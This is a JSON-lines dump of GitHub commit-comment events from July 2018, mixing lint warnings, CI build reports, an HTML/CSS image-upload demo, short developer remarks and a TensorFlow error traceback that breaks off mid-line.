{"id":"7992677767","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29773449,"position":2,"line":null,"path":"app/src/at-trivo/res/layout/activity_restful.xml","commit_id":"ff9f16598e777228fe7d63e7ff8845930e9dfb0c","created_at":"2018-07-20T03:01:48Z","updated_at":"2018-07-20T03:01:48Z","author_association":"NONE","body":"WARNING: [MergeRootFrame] This `<FrameLayout>` can be replaced with a `<merge>` tag\n If a `<FrameLayout>` is the root of a layout and does not provide background or padding etc, it can often be replaced with a `<merge>` tag which is slightly more efficient. Note that this depends on context, so make sure you understand how the `<merge>` tag works before proceeding."}},"created_at":"2018-07-20T03:01:48Z"}
{"id":"7992685527","type":"CommitCommentEvent","actor":{"login":"yuqiankun"},"repo":{"name":"xxg1413/MachineLearning"},"payload":{"comment":{"id":29773463,"position":null,"line":null,"path":null,"commit_id":"2832302adedd5199294b7de290e86f8e50cb92d7","created_at":"2018-07-20T03:04:47Z","updated_at":"2018-07-20T03:04:47Z","author_association":"NONE","body":"import numpy\r\n\r\nn=numpy.arange(8)\r\nprint(n)"}},"created_at":"2018-07-20T03:04:47Z"}
{"id":"7992692074","type":"CommitCommentEvent","actor":{"login":"deepjyoti30"},"repo":{"name":"NISH1001/playx"},"payload":{"comment":{"id":29773475,"position":null,"line":null,"path":null,"commit_id":"02cf0cb7e81c5ce28920d3b2b087defc140618a2","created_at":"2018-07-20T03:07:28Z","updated_at":"2018-07-20T03:07:28Z","author_association":"CONTRIBUTOR","body":"Mpd can't play from any directory, thats why i made the local playing with pyglet."}},"created_at":"2018-07-20T03:07:28Z"}
{"id":"7992692694","type":"CommitCommentEvent","actor":{"login":"vietquoc1960"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29773478,"position":null,"line":null,"path":null,"commit_id":"86d56419f4ff141eb566075c554ad74f16c66c0e","created_at":"2018-07-20T03:07:44Z","updated_at":"2018-07-20T03:07:44Z","author_association":"NONE","body":"Tôi KO BIÊT và cũng KO nhận đươc một điều gì..Biết ơn các bạn...I KO BIET and also KO get something .. Thank you ..."}},"created_at":"2018-07-20T03:07:44Z"}
{"id":"7992693267","type":"CommitCommentEvent","actor":{"login":"Setcina"},"repo":{"name":"Setcina/Setcina.github.io"},"payload":{"comment":{"id":29773479,"position":null,"line":null,"path":null,"commit_id":"17c58963187e97b249742ca17c047a2436b85c20","created_at":"2018-07-20T03:07:57Z","updated_at":"2018-07-20T03:07:57Z","author_association":"OWNER","body":"2"}},"created_at":"2018-07-20T03:07:57Z"}
{"id":"7992702411","type":"CommitCommentEvent","actor":{"login":"xiyi8580"},"repo":{"name":"xiyi8580/Algorithms-design-and-analysis-Standford-Course1"},"payload":{"comment":{"id":29773494,"position":null,"line":null,"path":null,"commit_id":"c64cf2eee471c1efa41d6fbdc50074f587fe115f","created_at":"2018-07-20T03:11:45Z","updated_at":"2018-07-20T03:11:45Z","author_association":"OWNER","body":"Working on how to solve super large number"}},"created_at":"2018-07-20T03:11:45Z"}
{"id":"7992706255","type":"CommitCommentEvent","actor":{"login":"NISH1001"},"repo":{"name":"NISH1001/playx"},"payload":{"comment":{"id":29773500,"position":null,"line":null,"path":null,"commit_id":"02cf0cb7e81c5ce28920d3b2b087defc140618a2","created_at":"2018-07-20T03:13:17Z","updated_at":"2018-07-20T03:13:17Z","author_association":"OWNER","body":"mpv can play from local directory. MPV and MPD are different constructs. MPV also provides seamless cli for seeking and volume control using arrows. That's why (I think) it's better to use MPV for local playing because we want to have an on-the-fly control of the songs being played.\r\n\r\nNevertheless, I think we can hook these local configs using a config file."}},"created_at":"2018-07-20T03:13:17Z"}
{"id":"7992708506","type":"CommitCommentEvent","actor":{"login":"NISH1001"},"repo":{"name":"NISH1001/playx"},"payload":{"comment":{"id":29773506,"position":null,"line":null,"path":null,"commit_id":"02cf0cb7e81c5ce28920d3b2b087defc140618a2","created_at":"2018-07-20T03:14:10Z","updated_at":"2018-07-20T03:14:10Z","author_association":"OWNER","body":"Is there any way to make pyglet have some default interface (using arrows) for seeking and volume control."}},"created_at":"2018-07-20T03:14:10Z"}
{"id":"7992709116","type":"CommitCommentEvent","actor":{"login":"GikaiKamito"},"repo":{"name":"GikaiKamito/lesson1"},"payload":{"comment":{"id":29773507,"position":26,"line":26,"path":"index.html","commit_id":"e7999b0c1ed339df93c418d0316ef9234fa65be1","created_at":"2018-07-20T03:14:26Z","updated_at":"2018-07-20T03:14:26Z","author_association":"OWNER","body":"< H1 > 仮想通貨億り人< BR > 一年で劇的に</ H1 >"}},"created_at":"2018-07-20T03:14:26Z"}
{"id":"7992718255","type":"CommitCommentEvent","actor":{"login":"johokugsk"},"repo":{"name":"johokugsk/forConference"},"payload":{"comment":{"id":29773554,"position":null,"line":null,"path":null,"commit_id":"4675dee87960c5af920193bef17d0b8cc1e006ab","created_at":"2018-07-20T03:18:01Z","updated_at":"2018-07-20T03:18:01Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-20T03:18:01Z"}
{"id":"7992719362","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29773556,"position":null,"line":null,"path":null,"commit_id":"5beb0e73a545ab292083bf833eb9082ba0c83f12","created_at":"2018-07-20T03:18:28Z","updated_at":"2018-07-20T03:18:28Z","author_association":"NONE","body":"The framework is empty, so I submitted a LTC for you here:\r\nhttp://tests.stockfishchess.org/tests/view/5b51542c0ebc5902bdb7d351\r\n\r\nGood luck!"}},"created_at":"2018-07-20T03:18:28Z"}
{"id":"7992723078","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29773562,"position":null,"line":null,"path":null,"commit_id":"2775b15e40796870779ff44f1d74e2c56eb2104c","created_at":"2018-07-20T03:20:06Z","updated_at":"2018-07-20T03:20:06Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2988 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-20T03:20:06Z"}
{"id":"7992728649","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29773574,"position":null,"line":null,"path":null,"commit_id":"ec5f9789a0828c7be1d1c1c738b2e0008d25d02b","created_at":"2018-07-20T03:22:26Z","updated_at":"2018-07-20T03:22:26Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-20T03:22:26Z"}
{"id":"7992729380","type":"CommitCommentEvent","actor":{"login":"VanessaSOliveira"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29773575,"position":null,"line":null,"path":null,"commit_id":"614d44dc96cedb617acded43d86eac319eddbb0b","created_at":"2018-07-20T03:22:46Z","updated_at":"2018-07-20T03:22:46Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Refatoração das views](https://trello.com/c/2vCXtjkh/219-refatora%C3%A7%C3%A3o-das-views)"}},"created_at":"2018-07-20T03:22:46Z"}
{"id":"7992729841","type":"CommitCommentEvent","actor":{"login":"marrymerry"},"repo":{"name":"marrymerry/ChineseNER_work"},"payload":{"comment":{"id":29773576,"position":null,"line":null,"path":null,"commit_id":"f4fa43068ec9dd04324cf77ca7dcb3a8a5d94372","created_at":"2018-07-20T03:22:58Z","updated_at":"2018-07-20T03:22:58Z","author_association":"OWNER","body":"This is my first work in distant supervision !"}},"created_at":"2018-07-20T03:22:58Z"}
{"id":"7992735218","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29773587,"position":null,"line":null,"path":null,"commit_id":"2775b15e40796870779ff44f1d74e2c56eb2104c","created_at":"2018-07-20T03:25:06Z","updated_at":"2018-07-20T03:25:06Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T03:25:06Z"}
{"id":"7992737199","type":"CommitCommentEvent","actor":{"login":"zhaoshifeng426"},"repo":{"name":"andyzasl/zabbix-templates"},"payload":{"comment":{"id":29773592,"position":null,"line":null,"path":null,"commit_id":"5bf2f67f2993bad8250475bc59bb053a2b7d24fd","created_at":"2018-07-20T03:25:53Z","updated_at":"2018-07-20T03:25:53Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-20T03:25:53Z"}
{"id":"7992743228","type":"CommitCommentEvent","actor":{"login":"lylGH"},"repo":{"name":"lylGH/projectone"},"payload":{"comment":{"id":29773602,"position":null,"line":null,"path":null,"commit_id":"ca1e18fb56bbacf3f2e4ea6552ea7ff42343f06a","created_at":"2018-07-20T03:28:21Z","updated_at":"2018-07-20T03:28:21Z","author_association":"OWNER","body":"有时候我们会碰到这样的需求，要求实现用户晒单评价、上传用户身份照片、用户反馈以及其他，所以不得不这个效果了。\r\n<!DOCTYPE html>\r\n<html>\r\n\r\n<head>\r\n\t<meta charset=\"utf-8\" />\r\n\t<title>JS实现带删除功能可以多张图片上传预览插件</title>\r\n\r\n\t<link href=\"css/common.css\" type=\"text/css\" rel=\"stylesheet\">\r\n\t<link href=\"css/index.css\" type=\"text/css\" rel=\"stylesheet\">\r\n</head>\r\n\r\n<body>\r\n\r\n\t<div class=\"img-box full\">\r\n\t\t<div class=\" img-section\">\r\n\t\t\t<p class=\"up-p\">上传图片demo：\r\n\t\t\t\t<span class=\"up-span\">最多可以上传5张图片,可以单张上传也可以多张上传</span>\r\n\t\t\t</p>\r\n\t\t\t<div class=\"z_photo upimg-div clear\">\r\n\t\t\t\t<div class=\"z_file fl\">\r\n\t\t\t\t\t<img src=\"img/a11.png\" class=\"add-img\">\r\n\t\t\t\t\t<input type=\"file\" name=\"file\" id=\"file\" class=\"file\" value=\"\" accept=\"image/jpg,image/jpeg,image/png,image/bmp\" multiple\r\n\t\t\t\t\t/>\r\n\t\t\t\t</div>\r\n\t\t\t</div>\r\n\t\t</div>\r\n\t</div>\r\n\t<div class=\"mask works-mask\">\r\n\t\t<div class=\"mask-content\">\r\n\t\t\t<p class=\"del-p \">您确定要删除图片吗？</p>\r\n\t\t\t<p class=\"check-p\">\r\n\t\t\t\t<span class=\"del-com wsdel-ok\">确定</span>\r\n\t\t\t\t<span class=\"wsdel-no\">取消</span>\r\n\t\t\t</p>\r\n\t\t</div>\r\n\t</div>\r\n\r\n\t<script src=\"js/jquery-1.8.3.min.js\"></script>\r\n\t<script src=\"js/fileImgs.js\"></script>\r\n\r\n\r\n</body>\r\n\r\n</html>"}},"created_at":"2018-07-20T03:28:21Z"}
{"id":"7992744242","type":"CommitCommentEvent","actor":{"login":"gabebw"},"repo":{"name":"thorncp/dotfiles"},"payload":{"comment":{"id":29773605,"position":null,"line":null,"path":null,"commit_id":"39daa5d6e2d8bec825aa7ccb38e454862f4ee2aa","created_at":"2018-07-20T03:28:47Z","updated_at":"2018-07-20T03:28:47Z","author_association":"NONE","body":"What's nice about fish? Do you get a lot of Zsh stuff for free, without configuring it?"}},"created_at":"2018-07-20T03:28:47Z"}
{"id":"7992748566","type":"CommitCommentEvent","actor":{"login":"lylGH"},"repo":{"name":"lylGH/projectone"},"payload":{"comment":{"id":29773611,"position":null,"line":null,"path":null,"commit_id":"ca1e18fb56bbacf3f2e4ea6552ea7ff42343f06a","created_at":"2018-07-20T03:30:33Z","updated_at":"2018-07-20T03:30:33Z","author_association":"OWNER","body":"/* common-css */\r\n\r\nbutton{\r\n\toutline: none;\r\n\tborder: 0px;\r\n}\r\ninput{\r\n\r\n\toutline: none;\r\n}\r\na {\r\n\toutline: none;\r\n}\r\na,button{cursor:pointer;} \r\n\r\nbody {\r\n\tbackground: #f4f4f4;\r\n\tfont-size: 14px;\r\n\tfont-family: \"微软雅黑\", \"PingFang SC\", \"arial, helvetica, sans-serif\";\r\n}\r\n.clear {\r\n\tclear: both;\r\n}\r\n.full{\r\n\twidth: 1210px;\r\n\tmin-width: 1210px;\r\n\tmargin: 0 auto;\r\n}\r\n\r\n/* ====clear float====== */\r\n/*nav a:visited{color: rgb(65,65,65);}\r\naside a:visited{color: rgb(65,65,65);}*/\r\n.fl {\r\n\tfloat: left;\r\n}\r\n.fr {\r\n\tfloat: right;\r\n}\r\n.clear:after {\r\n\tcontent: '';\r\n\tdisplay: block;\r\n\tclear: both;\r\n}\r\n/* reset */\r\n.pic img{display: none;}\r\ni,p,h1,h2,h3,h4,h5,h6,hr,br,em,dl,dd,li,ul,ol,td,th,pre,form,body,input,strong,textarea,select,figcaption,figure{\r\n\tmargin: 0;\r\n\tpadding: 0;\r\n}\r\nem {\r\n\tfont-style: normal\r\n}\r\nli {\r\n\tlist-style: none\r\n}\r\na {\r\n\ttext-decoration: none;\r\n}\r\nimg {\r\n\tborder: none;\r\n\t\r\n}\r\ntable {\r\n\tborder-collapse: collapse;\r\n}\r\ntextarea {\r\n\tresize: none;\r\n\toverflow: auto;\r\n}\r\na,button{cursor:pointer;} \r\n\r\n\r\n/*上传图片插件的样式*/\r\n.img-box{\r\n\tmargin-top: 40px;\r\n}\r\n.img-box .up-p{\r\n\tmargin-bottom: 20px;\r\n\tfont-size: 16px;\r\n\tcolor: #555;\r\n}\r\n.z_photo{\r\n\tpadding: 18px;\r\n\tborder:2px dashed #E7E6E6;\r\n\t/*padding: 18px;*/\r\n}\r\n.z_photo .z_file{\r\n\tposition: relative;\r\n}\r\n.z_file  .file{\r\n\twidth: 100%;\r\n\theight: 100%;\r\n\topacity: 0;\r\n\tposition: absolute;\r\n\ttop: 0px;\r\n\tleft: 0px;\r\n\tz-index: 100;\r\n}\r\n.z_photo .up-section{\r\n\tposition: relative;\r\n\tmargin-right: 20px;\r\n\tmargin-bottom: 20px;\r\n\tcursor: pointer;\r\n}\r\n.up-section .close-upimg{\r\n\twidth: 48px;\r\n\theight:48px;\r\n\tposition: absolute;\r\n\ttop: 0px;\r\n\tright: 0px;\r\n\tdisplay: none;\r\n\tz-index: 10;\r\n}\r\n.up-section .up-span{\r\n\tdisplay: block;\r\n\twidth: 100%;\r\n\theight: 100%;\r\n\tvisibility: hidden;\r\n\tposition: absolute;\r\n\ttop: 0px;\r\n\tleft: 0px;\r\n\tz-index: 9;\r\n\tbackground: rgba(0,0,0,.5);\r\n}\r\n.up-section:hover{\r\n\tborder:2px solid #5bcc21;\r\n}\r\n.up-section:hover .close-upimg{\r\n\tdisplay: block;\r\n}\r\n.up-section:hover .up-span{\r\n\tvisibility: visible;\r\n}\r\n.z_photo .up-img{\r\n\tdisplay: block;\r\n\twidth: 100%;\r\n\theight: 100%;\r\n}\r\n.loading{\r\n    border: 1px solid #D1D1D1;\r\n\tbackground:url(../img/loading.gif) no-repeat center;\r\n}\r\n.up-opcity{\r\n\topacity: 0;\r\n}\r\n.img-name-p{\r\n\tdisplay: none;\r\n}\r\n.upimg-div .up-section {\r\n    width: 190px;\r\n    height: 180px;\r\n}\r\n.img-box .upimg-div .z_file {\r\n    width: 190px;\r\n    height: 180px;\r\n}\r\n.z_file .add-img {\r\n    display: block;\r\n    width: 190px;\r\n    height: 180px;\r\n}\r\n/*遮罩层样式*/\r\n.mask{\r\n\tz-index: 1000;\r\n\tdisplay: none;\r\n\tposition: fixed;\r\n\ttop: 0px;\r\n\tleft: 0px;\r\n\twidth: 100%;\r\n\theight: 100%;\r\n\tbackground: rgba(0,0,0,.4);\r\n}\r\n.mask .mask-content{\r\n\twidth: 400px;\r\n\tposition: absolute;\r\n\ttop: 50%;\r\n\tleft: 53%;\r\n\tmargin-left: -250px;\r\n\tmargin-top: -90px;\r\n\tbackground: #fff;\r\n\theight: 175px;\r\n\ttext-align: center;\r\n\tz-index: 22;\r\n\tborder-radius: 6px;\r\n}\r\n.mask .mask-content .del-p{\r\n\tcolor: #555;\r\n\theight: 110px;\r\n\tline-height: 110px;\r\n\tfont-size: 18px;\r\n\tborder-bottom: 1px solid #D1D1D1;\r\n}\r\n.mask-content .check-p{\r\n\theight: 66px;\r\n\tline-height: 66px;\r\n\tposition: absolute;\r\n\tbottom: 0px;\r\n\tleft: 0px;\r\n\twidth: 100%;\r\n}\r\n.mask-content .check-p span{\r\n\twidth: 49%;\r\n\tdisplay: inline-block;\r\n\ttext-align: center;\r\n\tcolor: #f60;\r\n\tfont-size: 18px;\r\n\tcursor: pointer;\r\n}\r\n.check-p .del-com{\r\n\tborder-right: 1px solid #D1D1D1;\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-20T03:30:33Z"}
{"id":"7992750709","type":"CommitCommentEvent","actor":{"login":"lylGH"},"repo":{"name":"lylGH/projectone"},"payload":{"comment":{"id":29773616,"position":null,"line":null,"path":null,"commit_id":"ca1e18fb56bbacf3f2e4ea6552ea7ff42343f06a","created_at":"2018-07-20T03:31:26Z","updated_at":"2018-07-20T03:31:26Z","author_association":"OWNER","body":"这样我们在引入jquery.js就可以实现上传图片的效果了"}},"created_at":"2018-07-20T03:31:26Z"}
{"id":"7992751384","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"taskcluster/taskcluster-lib-api"},"payload":{"comment":{"id":29773617,"position":null,"line":null,"path":null,"commit_id":"c4bc5d1c959348d35195918f8e1747aaf31a3171","created_at":"2018-07-20T03:31:42Z","updated_at":"2018-07-20T03:31:42Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\n\nSchema Validation Failed!\nRejecting Schema: https://schemas.taskcluster.net/queue/v1/create-task-request.json#\nErrors:\n  * data should have required property 'created'\n  * data should have required property 'deadline'\n\n---\n\n* method:     createTask\n* errorCode:  InputValidationError\n* statusCode: 400\n* time:       2018-07-20T03:31:41.933Z\n\n</details>"}},"created_at":"2018-07-20T03:31:42Z"}
{"id":"7992751629","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29773618,"position":null,"line":null,"path":null,"commit_id":"e9721e63ef2dbeae331949b86e69114dea0c45da","created_at":"2018-07-20T03:31:47Z","updated_at":"2018-07-20T03:31:47Z","author_association":"NONE","body":"Since the framework is empty, I started a LTC test for you here:\r\nhttp://tests.stockfishchess.org/tests/view/5b51575a0ebc5902bdb7d353\r\n\r\nI hope this is OK.  Good luck!"}},"created_at":"2018-07-20T03:31:47Z"}
{"id":"7992751661","type":"CommitCommentEvent","actor":{"login":"Firecul"},"repo":{"name":"Firecul/project-lambdamenu"},"payload":{"comment":{"id":29773619,"position":null,"line":null,"path":null,"commit_id":"91e0fd2fb1fbc80c0838c4d354b61d6ad709f67b","created_at":"2018-07-20T03:31:48Z","updated_at":"2018-07-20T03:31:48Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Useful Tools](https://trello.com/c/ExQEHRfL/35-useful-tools)"}},"created_at":"2018-07-20T03:31:48Z"}
{"id":"7992754935","type":"CommitCommentEvent","actor":{"login":"LizhiT"},"repo":{"name":"lotuny/Cryptosystems"},"payload":{"comment":{"id":29773623,"position":null,"line":null,"path":null,"commit_id":"d136a12d5667f434a18ea941caedcb9d2699644b","created_at":"2018-07-20T03:33:07Z","updated_at":"2018-07-20T03:33:07Z","author_association":"NONE","body":"I want to be your friend, if you don't mind"}},"created_at":"2018-07-20T03:33:07Z"}
{"id":"7992771132","type":"CommitCommentEvent","actor":{"login":"Vyktorya"},"repo":{"name":"Vyktorya/miniature-giggle"},"payload":{"comment":{"id":29773661,"position":1,"line":1,"path":".gitignore","commit_id":"b55dddc7c8b5c677c99d37a232fb333c44ed697d","created_at":"2018-07-20T03:39:50Z","updated_at":"2018-07-20T03:39:50Z","author_association":"OWNER","body":"This XML file does not appear to have any style information associated with it. The document tree is shown below.\r\n<Error>\r\n<Code>AccessDenied</Code>\r\n<Message>Access Denied</Message>\r\n<RequestId>E98427F54F873300</RequestId>\r\n<HostId>\r\nQ01wkvdbBLlIKsz69SEhoVuggifz7kpJWljb6UmyBNKuJ1py22q7+WAXqUUU9eG9ZMl3DTxBXw0=\r\n</HostId>\r\n</Error>"}},"created_at":"2018-07-20T03:39:50Z"}
{"id":"7992771422","type":"CommitCommentEvent","actor":{"login":"arnaudviala"},"repo":{"name":"arnaudviala/celinecv"},"payload":{"comment":{"id":29773662,"position":4,"line":5,"path":"celine-style.css","commit_id":"e18ed239bb9f5f3488456359dda80042d734fd0e","created_at":"2018-07-20T03:39:57Z","updated_at":"2018-07-20T03:39:57Z","author_association":"OWNER","body":"Les tags du HTML sont fixés par le w3c. Tu peux pas en rajouter.\r\nJe vais donc probablement supprimer ça.\r\n\r\nPar contre, tu aurais pu créer une classe \"bis\".\r\nDéfinir dans le html qch du genre : <h4 class=\"bis\">Un autre titre</h4>\r\nEt dans le css, définir les règles ainsi \r\nh4.bis {   /* tous les h4 avec la classe \"bis\" */\r\n...\r\n}"}},"created_at":"2018-07-20T03:39:57Z"}
{"id":"7992772256","type":"CommitCommentEvent","actor":{"login":"connorlewis"},"repo":{"name":"connorlewis/wfa-statistics"},"payload":{"comment":{"id":29773664,"position":null,"line":null,"path":null,"commit_id":"05ddccffb64cd49dda87681e3fbb725b10fa0d14","created_at":"2018-07-20T03:40:17Z","updated_at":"2018-07-20T03:40:17Z","author_association":"OWNER","body":"@hlendway check tab.names for naming the tables. "}},"created_at":"2018-07-20T03:40:17Z"}
{"id":"7992772851","type":"CommitCommentEvent","actor":{"login":"EvanTheB"},"repo":{"name":"broadinstitute/picard"},"payload":{"comment":{"id":29773665,"position":null,"line":null,"path":null,"commit_id":"54298f6891ce98260038b7df7f73e24db0ae282b","created_at":"2018-07-20T03:40:31Z","updated_at":"2018-07-20T03:40:31Z","author_association":"NONE","body":"@yfarjoun thanks! "}},"created_at":"2018-07-20T03:40:31Z"}
{"id":"7992773951","type":"CommitCommentEvent","actor":{"login":"lpqdao"},"repo":{"name":"nicolasrosa/FCRN-DepthPrediction"},"payload":{"comment":{"id":29773667,"position":null,"line":null,"path":null,"commit_id":"10f005efaec2b6671d3740cc3b73066e07932fe7","created_at":"2018-07-20T03:40:58Z","updated_at":"2018-07-20T03:40:58Z","author_association":"NONE","body":"Hello,\r\n\r\nI am running your predict_nick code to train the nyudepth dataset. I've downloaded the dataset looking at nyudepth.py by converting the .mat file to .png files. However, when I run the code, this is what I received.\r\n\r\n[fcrn] Selected Params:\r\n\r\nNamespace(batch_size=4, data_aug=False, data_path='~/tensorflow/FCRN-DepthPrediction/tensorflow/modules/datasets', dataset='nyudepth', dropout=0.5, full_summary=False, gpu='0', image_path='', l2norm=True, ldecay=True, learning_rate=0.0001, log_directory='log_tb/', loss='berhu', machine='grace', max_steps=75000, mode='train', model_name='fcrn', model_path='', output_directory='', px='all', remove_sky=False, show_test_results=False, show_train_progress=True, show_valid_progress=True)\r\n\r\n[fcrn] Selected mode: Train\r\nnyudepth\r\nNYU Dataset selected\r\n[Dataloader] NyuDepth object created.\r\n\r\n[Dataloader] Loading 'data/nyudepth_train.txt'...\r\n(795, 2)\r\ntime: 0.00011992454528808594 s\r\n\r\nSummary - TrainData\r\nimage_filenames: 795\r\ndepth_filenames: 795\r\n\r\n[Dataloader] Loading 'data/nyudepth_test.txt'...\r\n(654, 2)\r\ntime: 8.034706115722656e-05 s\r\n\r\nSummary - TestData (Validation Set)\r\nimage_filenames: 654\r\ndepth_filenames: 654\r\n\r\n[Dataloader] dataloader object created.\r\nnyudepth\r\n~/tensorflow/FCRN-DepthPrediction/tensorflow/modules/datasets/\r\n480 640 3\r\n480 640 1\r\n<class 'list'>\r\ntf image filenames Tensor(\"Const_4:0\", shape=(795,), dtype=string)\r\ntf depth filenames Tensor(\"Const_5:0\", shape=(795,), dtype=string)\r\ntf train input queue [<tf.Tensor 'input_producer/GatherV2:0' shape=() dtype=string>, <tf.Tensor 'input_producer/GatherV2_1:0' shape=() dtype=string>]\r\ntf image file.---------------------- Tensor(\"ReadFile:0\", shape=(), dtype=string)\r\ntf depth file ----------------------- Tensor(\"ReadFile_1:0\", shape=(), dtype=string)\r\ntf_image_key: Tensor(\"Print_1:0\", shape=(), dtype=string)\r\ntf_depth_key: Tensor(\"input_producer/GatherV2_1:0\", shape=(), dtype=string)\r\ntf_image_file: Tensor(\"Print_2:0\", shape=(), dtype=string)\r\ntf_depth_file: Tensor(\"ReadFile_1:0\", shape=(), dtype=string)\r\ntf_image: Tensor(\"DecodePng:0\", shape=(?, ?, 3), dtype=uint8)\r\ntf_depth: Tensor(\"DecodePng_1:0\", shape=(?, ?, 1), dtype=uint16)\r\ntf_image_shape: Tensor(\"Shape:0\", shape=(3,), dtype=int32)\r\ntf_depth_shape: Tensor(\"Shape_1:0\", shape=(3,), dtype=int32)\r\n\r\n[Network/Model] Build Network Model...\r\n\r\n[Network/Train] Training Tensors created.\r\nTensor(\"model/Input/batch_1:0\", shape=(4, 228, 304, 3), dtype=float32)\r\nTensor(\"model/Input/batch_1:1\", shape=(4, 228, 304, 3), dtype=uint8)\r\nTensor(\"model/Input/batch_1:2\", shape=(4, 128, 160, 1), dtype=float32)\r\n<tf.Variable 'model/Train/global_step:0' shape=() dtype=int32_ref>\r\nTensor(\"model/Train/learning_rate_1:0\", shape=(), dtype=float32)\r\n\r\nDEBUG------------------------- Tensor(\"model_1/ReadFile:0\", shape=(), dtype=string)\r\nDEBUG--------------------------- Tensor(\"model_1/DecodePng:0\", shape=(?, ?, 3), dtype=uint8)\r\n[Network/Validation] Validation Tensors created.\r\nTensor(\"model_1/convert_image:0\", shape=(?, ?, 3), dtype=float32)\r\nTensor(\"model_1/truediv:0\", shape=(?, ?, 1), dtype=float32)\r\nTensor(\"model_1/resize_images/Squeeze:0\", shape=(228, 304, 3), dtype=float32)\r\nTensor(\"model_1/convert_image_1:0\", shape=(228, 304, 3), dtype=uint8)\r\nTensor(\"model_1/resize_images_1/Squeeze:0\", shape=(128, 160, 1), dtype=float32)\r\n\r\n[Network/Loss] Loss: All Pixels\r\n[Network/Loss] Loss Function: BerHu\r\n[Network/Model] Number of trainable parameters: 63572737\r\n\r\nTrain with approximately 377 epochs\r\n\r\n[Network/Training] Initializing graph's variables...\r\n[Network/Training] Training Initialized!\r\n\r\nTraceback (most recent call last):\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 1322, in _do_call\r\nreturn fn(*args)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 1307, in _run_fn\r\noptions, feed_dict, fetch_list, target_list, run_metadata)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 1409, in _call_tf_sessionrun\r\nrun_metadata)\r\ntensorflow.python.framework.errors_impl.OutOfRangeError: FIFOQueue '_2_model/Input/batch_1/fifo_queue' is closed and has insufficient elements (requested 4, current size 0)\r\n[[Node: model/Input/batch_1 = QueueDequeueManyV2[component_types=[DT_FLOAT, DT_UINT8, DT_FLOAT], timeout_ms=-1, _device=\"/job:localhost/replica:0/task:0/device:CPU:0\"](model/Input/batch_1/fifo_queue, model/Input/batch/n)]]\r\n\r\nDuring handling of the above exception, another exception occurred:\r\n\r\nTraceback (most recent call last):\r\nFile \"predict_nick.py\", line 585, in\r\ntf.app.run(main=main(args))\r\nFile \"predict_nick.py\", line 566, in main\r\ntrain(args)\r\nFile \"predict_nick.py\", line 308, in train\r\nmodel.tf_summary_train_loss])\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 900, in run\r\nrun_metadata_ptr)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 1135, in _run\r\nfeed_dict_tensor, options, run_metadata)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 1316, in _do_run\r\nrun_metadata)\r\nFile \"/home/grace/tensorflow/venv/lib/python3.6/site-packages/tensorflow/python/client/session.py\", line 1335, in _do_call\r\nraise type(e)(node_def, op, message)\r\ntensorflow.python.framework.errors_impl.OutOfRangeError: FIFOQueue '_2_model/Input/batch_1/fifo_queue' is closed and has insufficient elements (requested 4, current size 0)\r\n[[Node: model/Input/batch_1 = QueueDequeueManyV2[component_types=[DT_FLOAT, DT_UINT8, 